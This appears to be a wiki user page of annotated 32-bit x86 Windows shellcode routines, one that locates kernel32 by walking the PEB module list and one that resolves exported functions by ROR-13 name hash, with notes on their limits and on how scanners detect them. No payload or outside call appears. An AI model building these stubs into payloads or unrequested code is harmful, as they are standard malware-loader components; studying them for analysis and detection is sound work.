
User:Hatter/Windows Shellcode

 
    ;-----------------------------------------------------------------------
    ; find_kernel32 — locate a module base by walking the PEB loader list
    ; Target: 32-bit x86 Windows only (fs segment = TEB, pushad/popad).
    ; In:    nothing; reads fs:[0x30] (TEB -> PEB per the standard 32-bit layout)
    ; Out:   eax = DllBase of the first entry in the initialization-order
    ;        module list whose UTF-16 base name has a NUL at WCHAR index 12,
    ;        i.e. a 12-character name (the code assumes that is kernel32.dll)
    ; Clobb: none — every register is restored by popad; the result is
    ;        returned by overwriting the saved-eax slot before popad
    ; Note:  the name check is only a length heuristic, and the list is
    ;        circular, so if no 12-character base name exists the loop below
    ;        does not terminate.
    ; Defender note: resolving a module through the PEB instead of the import
    ;        table (fs:[0x30] -> Ldr -> module list) is a long-signatured
    ;        position-independent-code pattern; emulators and memory scanners
    ;        commonly flag this exact instruction sequence.
    ;-----------------------------------------------------------------------
    find_kernel32:
            pushad                          ; preserve all registers (32 bytes: eax is at [esp+0x1c])
            xor     ecx, ecx                ; ecx = 0: zero displacement base below and the NUL WCHAR compared later
            mov     esi, [fs:ecx + 0x30]    ; esi = PEB (TEB+0x30); presumably written via ecx to avoid NUL bytes in the encoding
            mov     esi, [esi + 0x0C]       ; esi = PEB->Ldr
            mov     esi, [esi + 0x1C]       ; esi = Ldr->InInitializationOrderModuleList.Flink (first list link)
    next_module:
            mov     ebx, [esi + 0x08]       ; ebx = DllBase (offset relative to this list link, not to the entry start)
            mov     edx, [esi + 0x20]       ; edx = BaseDllName.Buffer (UTF-16 module name)
            mov     esi, [esi]              ; esi = Flink: advance before the test, so the walk is circular
            cmp     [edx + 12 * 2], cx      ; WCHAR index 12 (byte 24) == 0 ? -> name is exactly 12 characters
            jne     short next_module       ; not a 12-character name: keep walking
            mov     [esp + 0x1c], ebx       ; place DllBase in the saved-eax slot so popad returns it in eax
            popad
            ret
    ;-----------------------------------------------------------------------
    ; find_function — resolve an export by a ROR-13 hash of its ASCII name
    ; C-style call, two 32-bit stack args, caller cleans the stack (plain ret):
    ;     void *find_function(void *module_base, uint32_t name_hash)
    ; Target: 32-bit x86, PE32 image (offsets below are the PE32 ones)
    ; In:    [esp+4] = module_base (image base of a loaded PE)
    ;        [esp+8] = name_hash, computed as h = ror(h,13) + byte over the
    ;                  NUL-terminated export name, starting from h = 0
    ; Out:   eax = virtual address of the matching export
    ;        eax is left UNCHANGED when no name matches — there is no error
    ;        indication, the caller cannot distinguish "not found"
    ; Clobb: none — pushad/popad; result written into the saved-eax slot
    ; Notes: forwarded exports (an RVA that points back into the export
    ;        directory) are returned as-is, not resolved; the `mov cx`
    ;        below only writes the low 16 bits of ecx, which is fine only
    ;        while NumberOfNames < 0x10000 (upper bits are then zero)
    ; Defender note: the `ror edi, 0xd / add edi, eax` loop and the
    ;        e_lfanew -> export-directory walk are the canonical API-hashing
    ;        idiom; the hash constants passed in name_hash are a common
    ;        detection artefact in memory and in static scanners.
    ;-----------------------------------------------------------------------
    find_function:
            pushad                          ; 8 regs saved; [esp+0x20] = return address, [esp+0x24] = arg 1
            mov     ebp, [esp + 0x24]       ; ebp = module_base
            mov     eax, [ebp + 0x3c]       ; eax = e_lfanew (offset of the PE signature)
            mov     edx, [ebp + eax + 0x78] ; edx = RVA of export directory (DataDirectory[0] in the PE32 optional header)
            add     edx, ebp                ; edx = export directory VA
            mov     ecx, [edx + 0x18]       ; ecx = NumberOfNames
            mov     ebx, [edx + 0x20]       ; ebx = AddressOfNames RVA (array of name RVAs)
            add     ebx, ebp                ; ebx = AddressOfNames VA
    find_function_loop:
            jecxz   find_function_finished  ; no names left: exit without touching the saved eax
            dec     ecx                     ; iterate from the last name down to index 0
            mov     esi, [ebx + ecx * 4]    ; esi = RVA of the ecx-th name string
            add     esi, ebp                ; esi = name VA
    compute_hash:
            xor     edi, edi                ; edi = hash accumulator, starts at 0
            xor     eax, eax                ; eax = 0 so lodsb leaves a zero-extended byte in eax
            cld                             ; lodsb must increment esi
    compute_hash_again:
            lodsb                           ; al = *esi++
            test    al, al
            jz      compute_hash_finished   ; NUL terminator: name fully hashed
            ror     edi, 0xd                ; h = ror(h, 13)
            add     edi, eax                ; h += byte
            jmp     compute_hash_again
    compute_hash_finished:
            cmp     edi, [esp + 0x28]       ; hash == name_hash (arg 2)?
            jnz     find_function_loop      ; no: try the next name
            mov     ebx, [edx + 36]         ; ebx = AddressOfNameOrdinals RVA (+0x24)
            add     ebx, ebp
            mov     cx, [ebx + 2 * ecx]     ; cx = ordinal of the matching name (16-bit entries)
            mov     ebx, [edx + 28]         ; ebx = AddressOfFunctions RVA (+0x1c)
            add     ebx, ebp
            mov     eax, [ebx + 4 * ecx]    ; eax = function RVA indexed by ordinal
            add     eax, ebp                ; eax = function VA (forwarders are not followed)
            mov     [esp + 0x1c], eax       ; return value via the saved-eax slot
    find_function_finished:
            popad
            ret